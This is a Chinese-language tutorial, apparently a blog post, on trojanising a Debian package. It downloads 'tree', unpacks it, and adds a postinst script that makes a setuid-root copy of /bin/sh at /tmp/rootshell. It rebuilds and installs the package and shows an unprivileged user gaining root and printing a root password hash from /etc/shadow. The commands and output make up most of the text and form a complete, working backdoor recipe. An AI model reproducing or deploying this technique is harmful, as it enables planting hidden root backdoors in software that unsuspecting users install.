|
以下介绍怎样制作包括后门的deb安装包。以tree为例进行说明。利用apt-get下载安装包。--download-only表示仅仅下载不做其它处理。 |
|
root@deb:~#apt-get download --download-only tree Get:1Downloading tree 1.6.0-1 [43.3 kB] Fetched43.3 kB in 2s (21.4 kB/s) root@deb:~#ls -l total44 -rw-r--r--1 root root 43314 Feb 4 2012 tree_1.6.0-1_amd64.deb |
|
解压deb安装包,并创建文件夹DEBIAN(大写),在DEBIAN文件夹下创建文件control和postinst。 |
|
Control。包括deb包说明信息,比如:包名,版本。平台。作者等。 [EN]:http://www.debian.org/doc/manuals/debian-faq/ch-pkg_basics.en.html [CN]:http://www.debian.org/doc/manuals/debian-faq/ch-pkg_basics.zh-cn.html |
|
Postinst。完毕Debian包文件解包文件的配置工作。通常,“postinst”脚本等待用户输入,或提醒用户。假设他接受当前默认值。要记得软件包安装完后返回又一次配置。很多“postinst”脚本负责运行有关命令为新安装或升级的软件重新启动服务。 |
|
root@deb:~#dpkg -x tree_1.6.0-1_amd64.deb tree_1.6.0-1_amd64 root@deb:~#mkdir ./tree_1.6.0-1_amd64/DEBIAN root@deb:~#cd ./tree_1.6.0-1_amd64/DEBIAN/ root@deb:~/tree_1.6.0-1_amd64/DEBIAN#touch control postinst |
|
Control内容,可来源于dpkg–info /path/to/debfile |
|
root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg --info /root/tree_1.6.0-1_amd64.deb newdebian package, version 2.0. size43314 bytes: control archive=664 bytes. 393bytes, 12 lines control 433bytes, 7 lines md5sums Package:tree Version:1.6.0-1 Architecture:amd64 Maintainer:Florian Ernst <florian@debian.org> Installed-Size:109 Depends:libc6 (>= 2.3) Section:utils Priority:optional Homepage:http://mama.indstate.edu/users/ice/tree/ Description:displays directory tree, in color Displaysan indented directory tree, using the same color assignments as ls,via the LS_COLORS environment variable. |
|
终于control文件内容例如以下: |
|
root@deb:~/tree_1.6.0-1_amd64/DEBIAN#cat control Package:tree Version:1.6.0-1 Architecture:amd64 Maintainer:Florian Ernst <florian@debian.org> Installed-Size:109 Depends:libc6 (>= 2.3) Section:utils Priority:optional Homepage:http://mama.indstate.edu/users/ice/tree/ Description:displays directory tree, in color Displays an indented directorytree, using the same color assignments as ls, via the LS_COLORSenvironment variable. |
|
终于postinst脚本内容例如以下: |
|
root@deb:~/tree_1.6.0-1_amd64/DEBIAN#cat postinst #!/bin/bash
sudo cp /bin/sh /tmp/rootshell && sudo chown root:root/tmp/rootshell && sudo chmod 4755 /tmp/rootshell root@deb:~/tree_1.6.0-1_amd64/DEBIAN#chmod 755 postinst |
|
全部配置文件准备完毕后。使用dpkg-deb打包,成功创建包括后门的安装包tree_1.6.0-1_amd64.deb. |
|
root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /root/ total4 drwxr-xr-x4 root root 4096 Aug 26 06:17 tree_1.6.0-1_amd64 root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg-deb --build /root/tree_1.6.0-1_amd64/ dpkg-deb:building package `tree' in `/root/tree_1.6.0-1_amd64.deb'. root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /root/ total48 drwxr-xr-x4 root root 4096 Aug 26 06:17 tree_1.6.0-1_amd64 -rw-r--r--1 root root 43156 Aug 26 06:28 tree_1.6.0-1_amd64.deb |
|
安装后门deb包,创建/tmp/rootshell文件. |
|
root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /tmp/ total20 drwx------2 docker docker 4096 Aug 26 05:15 pulse-bmNZfTJ6gWCq drwx------2 root root 4096 Aug 26 05:14 pulse-PKdhtXMmr18n drwx------2 Debian-gdm Debian-gdm 4096 Aug 26 05:15 pulse-ZvmMH2Gn4QZR drwx------2 docker docker 4096 Aug 26 05:15 ssh-qkrUkg0Dfu9v drwxr-xr-x2 docker docker 4096 Aug 26 05:15 tracker-docker root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg -i /root/tree_1.6.0-1_amd64.deb Selectingpreviously unselected package tree. (Readingdatabase ... 130311 files and directories currently installed.) Unpackingtree (from /root/tree_1.6.0-1_amd64.deb) ... Settingup tree (1.6.0-1) ... Processingtriggers for man-db ... root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /tmp/ total128 drwx------2 docker docker 4096 Aug 26 05:15 pulse-bmNZfTJ6gWCq drwx------2 root root 4096 Aug 26 05:14 pulse-PKdhtXMmr18n drwx------2 Debian-gdm Debian-gdm 4096 Aug 26 05:15 pulse-ZvmMH2Gn4QZR -rwsr-xr-x1 root root 106920 Aug 26 06:29 rootshell drwx------2 docker docker 4096 Aug 26 05:15 ssh-qkrUkg0Dfu9v drwxr-xr-x2 docker docker 4096 Aug 26 05:15 tracker-docker |
|
执行后门 |
|
docker@deb:/root/tree_1.6.0-1_amd64/DEBIAN$/tmp/rootshell #id uid=1000(docker)gid=1000(docker) euid=0(root)groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),105(scanner),110(bluetooth),112(netdev),1000(docker) #head -1 /etc/shadow root:$6$GiCLTee$AEFGgQdvK2LG3m7gtD6.HG39rIrkhh48P..234Xs3DFuxUJ/B7jfJO5mJryPCRmeW1sGHvgf6GT77ztJ.PHO31:16302:0:99999:7::: # |
參考链接:
http://pastebin.com/m5XULth7#
http://www.offensive-security.com/metasploit-unleashed/Binary_Linux_Trojan